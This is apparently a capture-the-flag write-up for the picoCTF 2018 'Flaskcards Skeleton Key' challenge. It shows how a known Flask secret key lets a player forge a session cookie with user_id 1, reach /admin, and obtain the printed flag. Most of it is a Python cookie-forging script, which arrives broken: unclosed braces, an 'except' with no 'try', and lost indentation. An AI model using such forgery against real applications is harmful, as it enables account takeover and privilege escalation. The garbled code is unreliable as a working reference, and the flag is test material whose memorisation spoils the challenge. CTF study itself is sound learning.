
The answer to the question in the hint ("What can you do with a flask
Secret_Key?") is "it depends" : Flask is very flexible, and many extensions
use the key in different ways or replace Flask's session mechanism.

But in the case of a "vanilla" Flask app (no extensions used) the secret ket is
used to sign the session cookie.

A quick search for "Flask decrypt cookie" yielded
[this gist](https://gist.github.com/babldev/502364a3f7c9bafaa6db), which was a
good starting point.

_Note : Flask needs to be installed for this code to run_

If we decode the cookie, we see it has 4 field = `_fresh`, `_id`, `csrf_token`
and `user_id`. No `admin` field this time !

The only field that seemed interesting was the `user_id` field. Asserting that
`admin` was the first user created, I tried forging a cookie with a `user_id`
of `1`.

Here's my script :

import hashlib
from itsdangerous import URLSafeTimedSerializer
from flask.sessions import TaggedJSONSerializer
from sys import argv

KEY = '3589a201d98658da606797c074cc2216' # from the task description

def decode_flask_cookie(secret_key, cookie_str):
salt = 'cookie-session'
serializer = TaggedJSONSerializer()
signer_kwargs = {
'key_derivation': 'hmac',
'digest_method': hashlib.sha1
s = URLSafeTimedSerializer(secret_key, salt=salt, serializer=serializer, signer_kwargs=signer_kwargs)
return s.loads(cookie_str)

def encode_flask_cookie(secret_key, cookie):
salt = 'cookie-session'
serializer = TaggedJSONSerializer()
signer_kwargs = {
'key_derivation': 'hmac',
'digest_method': hashlib.sha1
s = URLSafeTimedSerializer(secret_key, salt=salt, serializer=serializer, signer_kwargs=signer_kwargs)
return s.dumps(cookie)

if __name__ == '__main__':
cookie = argv[1]
except IndexError:
print(f'usage: {argv[0]} [COOKIE]')
cookie_val = (decode_flask_cookie(KEY, cookie))
new_cookie = dict(cookie_val)
new_cookie['user_id'] = '1'
print(encode_flask_cookie(KEY, new_cookie))

If we pass it the app's cookie and then request `/admin` with the generated
cookie, we get the flag : `picoCTF{1_id_to_rule_them_all_d77c1ed6} `.

Original writeup (http://blog.iodbh.net/picoctf2018-web-flaskcards-skeleton-key.html).